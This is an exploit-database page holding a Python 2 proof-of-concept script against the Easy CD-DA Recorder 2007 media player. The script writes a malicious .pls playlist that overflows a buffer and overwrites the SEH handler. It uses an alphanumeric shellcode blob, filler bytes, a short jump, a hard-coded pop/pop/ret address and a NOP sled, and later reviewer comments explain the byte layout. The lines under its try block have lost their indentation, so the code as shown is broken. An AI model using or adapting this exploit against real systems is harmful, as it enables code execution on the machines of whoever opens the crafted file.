Easy CD-DA Recorder Buffer Overflow Exploit (SEH)

2011-02-23 14:15:50

#!/usr/bin/python
#
#[+]Exploit Title: Exploit Buffer Overflow Easy CD-DA Recorder(SEH)
#[+]Date: 02\22\2011
#[+]Author: x000
#[+]Software Link: http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
#[+]Version: 2007 Version:
#[+]Tested on: WIN-XP SP3 Brazilian Portuguese
#[+]Cve: N/A
#[+]Language: Portuguese
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#
#ESCRITO EM PYTHON SO PRA LEMBRAR
#
#Criado por x000
#E-mail [email protected]
#Site www.x000.org/
#
#Link de Download: http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html
#
#
#

import time
import struct
import os
import sys

# Cosmetic terminal setup only: clear the screen and, on Windows, switch the
# console colours. Nothing here affects the file that is written later.
if os.name != 'nt':
    os.system("clear")
else:
    os.system("cls")
    os.system("color 4f")



def usage():
    """Print the author's banner to stdout; takes no arguments, returns None."""
    banner = """
=======================================================
=======================================================
==========Exploit Buffer Overflow Easy CD-DA Recorder==
==========Author x000==================================
==========E-mail [email protected]==================
==========Site www.x000.org/===========================
=======================================================
=======================================================
"""
    print banner



# Exactly one command-line argument is expected: the name of the file to
# create. Any other count prints the banner and the Portuguese usage help
# ("Modo de Uso" = usage, "Exemplo" = example), then exits with status 0.
if len(sys.argv) != 2:
    usage()
    for help_line in ("\t\t[-]Modo de Uso: python %s <Nome do Arquivo>",
                      "\t\t[-]Exemplo: python %s exploit.pls"):
        print help_line % sys.argv[0]
    sys.exit(0)

# Builds the proof-of-concept file named on the command line. The code below
# is a flat byte layout, so statement order is significant. Python 2 syntax.
#
# Defender summary, from the values visible in this listing: the output is a
# single unbroken line of 11147 bytes (1108 + 4 + 4 + 24 + 7 + 10000). It
# begins with upper-case alphanumeric text and contains no "[playlist]"
# section header, which a well-formed .pls playlist starts with (the usage
# text suggests a .pls name). A playlist file with that shape is a reasonable
# thing to flag or quarantine. The page records no fix and no CVE, and lists
# Windows XP SP3 as the only tested platform.
usage()

# Status message (Portuguese): "identifying the size of the shellcode".
print "\t\t[+]Idendificando o Tamanho do Shellcode\n"
time.sleep(1)
# Printable payload made only of upper-case letters and digits. The script's
# own messages call it the shellcode; what it does when run is not documented
# anywhere on the page.
buffer = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKO0FQHIOOCL4VBPHLXYC"
"DFDL4NQ5NV8VQBXR8MSM8KLUSCHU8ZTMUP03HOL3UXID8NVQ3JUJSNTNNSM5RNJGJ6RELOOBBZM5MF4X"
"U56GYGQM7Z63PZURQ8JTFP5L5R49WSLKKEKC5RKL0Q7IM1XKMVBP85KORM8XCZW7KSJHO0LPO7SN30SY"
"4F7JWN87KMSLNMSUOPWPSSTF1OQWCHML5IVL59QCNLXJUNJJQ35OXGVLYWMGKIPXYKNPQ51NVTNVOK5U"
"IMW873HFOPYJ0SKYGUU3OKXSKXJA")

# Status message (Portuguese): "size of the shellcode:" followed by its length.
print "\t\t[+]Tamaho do Shellcode:"+str(len(buffer))+"\n"
time.sleep(1)

# Pad with 0x41 ("A") so the buffer is exactly 1108 bytes long. If the payload
# were longer than 1108 the multiplier would be negative and add nothing.
buffer += "\x41" * (1108-len(buffer))
# Four bytes at offset 1108: 0xEB 0x06 is an x86 short jump forward by six
# bytes, followed by two 0x90 NOPs. NOTE(review): given the title's "SEH",
# this presumably lands on the exception registration record - confirm.
buffer += "\xeb\x06\x90\x90"
# Hard-coded 32-bit little-endian address, labelled by the author as a
# pop/pop/ret sequence. It is only meaningful if some module is mapped at the
# same address on every run; which module that is is not stated on the page.
# SafeSEH, SEHOP and ASLR are the mitigations aimed at this class of overwrite.
buffer += struct.pack('<L',0x100752C9)#P/P/Ret
buffer += "\x90" * 24#24 nops
# Seven raw x86 opcode bytes ending in 0xC3 (ret); the author gives no
# explanation of this stub.
buffer += "\x61\x61\x61\x52\x58\x50\xc3"
# 10000 further 0x41 filler bytes appended after the stub.
buffer += "\x41" * 10000

# Status message (Portuguese): "creating file <name>...".
print "\t\t[+]Criando Arquivo "+sys.argv[1]+"...\n"
time.sleep(1)
try:
# Text mode "w" is used although the data is raw bytes; the handle is closed
# explicitly, so it is not closed if write() raises.
FILE = open(sys.argv[1],"w")
FILE.write(buffer)
FILE.close()
# Success message (Portuguese): "done, file created successfully".
print "\t\t[+]Pronto Arquivo Criado Som Sucesso";
time.sleep(1)
# NOTE(review): the bare except hides the real error, and the message below
# prints sys.argv[0] (the script name) rather than the output file name.
except:
print "\t\t[+]Erro ao Criar Arquivo "+sys.argv[0]

Fixes

No fixes
